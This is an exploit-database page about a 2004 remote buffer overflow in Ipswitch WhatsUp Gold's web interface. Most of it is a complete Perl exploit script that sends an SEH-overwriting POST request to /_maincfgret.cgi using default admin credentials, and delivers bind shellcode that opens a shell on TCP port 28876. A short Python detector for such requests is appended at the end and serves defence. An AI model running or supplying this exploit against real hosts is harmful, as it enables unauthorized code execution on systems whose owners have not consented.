Ipswitch WhatsUp Gold 7.0/8.0 – Notification Instance Name Remote Buffer Overflow
Vulnerability ID | 1054581 | Vulnerability type | |
Published | 2004-09-03 | Updated | 2004-09-03 |
CVE ID | N/A |
CNNVD ID | N/A |
Platform | Windows | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/11109/info
The Ipswitch WhatsUp Gold web interface is prone to a remotely exploitable buffer overflow vulnerability. This may be exploited by authenticated users of the interface to execute arbitrary code in the context of the program.
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);

# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01".
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);

# HTTP request headers; the body (Content-Length) is sent after $cmd is built
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer: http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";

# Form body; the overflow goes into the instancename field
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811;                #815 -4: filler up to the SEH record
$cmd .= "\xeb\x06\x90\x90";     #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "\xfe\x63\xa1\x71";    #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75";     #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE";            #garbage :D
$cmd .= "\x90"x2080;            #nop sled
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #more filler
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";

print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";
close($socket);
exit(0);

sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host] Target host\n[port] WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
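As an added example (not part of the original advisory or the exploit above), a small detector that inspects raw HTTP requests to the WhatsUp Gold web interface and flags POSTs to /_maincfgret.cgi whose instancename field is far longer than a real name, contains a long filler/NOP run, or carries non-printable bytes. The path and field name come from the exploit above; the thresholds and the sample requests are assumptions constructed for the demonstration.

```python
"""Added example, not part of the original advisory or exploit: flag HTTP
requests shaped like the overflow above (POST to /_maincfgret.cgi with an
oversized or binary-looking instancename field). Thresholds are assumptions."""
import re
from urllib.parse import unquote_to_bytes

SUSPECT_PATH = "/_maincfgret.cgi"   # endpoint used by the exploit above
SUSPECT_FIELD = "instancename"      # overflowed form field
MAX_NAME_LEN = 256                  # assumed sane bound for an instance name
FILLER_RUN = 64                     # assumed: this many identical bytes in a row

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, path, _ = head.split(b"\r\n")[0].split(b" ", 2)
    return method.decode(), path.decode(), body

def parse_form(body: bytes) -> dict:
    """Decode application/x-www-form-urlencoded as bytes so raw payload bytes survive."""
    fields = {}
    for pair in body.split(b"&"):
        k, _, v = pair.partition(b"=")
        fields[k.decode(errors="replace")] = unquote_to_bytes(v.replace(b"+", b" "))
    return fields

def inspect_request(raw: bytes) -> list:
    """Return findings for one request; an empty list means it looks benign."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != SUSPECT_PATH:
        return []
    name = parse_form(body).get(SUSPECT_FIELD, b"")
    findings = []
    if len(name) > MAX_NAME_LEN:
        findings.append(f"{SUSPECT_FIELD} length {len(name)} exceeds {MAX_NAME_LEN}")
    run = re.search(rb"(.)\1{%d,}" % (FILLER_RUN - 1), name, re.S)
    if run:
        findings.append(f"filler run of 0x{run.group(1)[0]:02x} x{len(run.group(0))}")
    if any(b < 0x20 or b > 0x7e for b in name):
        findings.append(f"non-printable bytes in {SUSPECT_FIELD}")
    return findings

# constructed sample requests (not captured traffic)
BENIGN = (b"POST /_maincfgret.cgi HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n"
          b"page=notify&type=Beeper&instancename=Beeper1&end=end")
OVERFLOW = (b"POST /_maincfgret.cgi HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n"
            b"page=notify&type=Beeper&instancename=" + b"A" * 811
            + b"\x90" * 2080 + b"E" * 1000 + b"&end=end")
```

Run `inspect_request(OVERFLOW)` to see all three findings fire on the constructed overflow request, while `inspect_request(BENIGN)` returns an empty list.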